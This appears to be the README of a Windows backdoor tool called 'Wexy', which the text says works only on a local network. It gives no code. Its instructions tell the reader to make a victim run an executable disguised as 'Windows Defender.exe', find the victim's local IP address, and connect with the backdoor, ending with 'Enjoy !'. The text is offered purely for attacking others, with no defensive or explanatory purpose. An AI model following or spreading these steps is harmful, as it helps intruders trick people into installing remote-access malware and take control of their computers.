
============================================================
==           Wexy - Windows Backdoor		 	  ==
============================================================
==   - At the moment , it only works in LAN               ==
============================================================


============================================================
==           Instructions          			  ==
============================================================
==   - Make the victim run the Windows Defender.exe file  ==
==   - Get his local IP Adress 			    	  ==
==   - Connect to it with the backdoor 			  ==
==   - Enjoy !                   		          ==
============================================================
==  Credits go to mem0rYLaek 				  ==
============================================================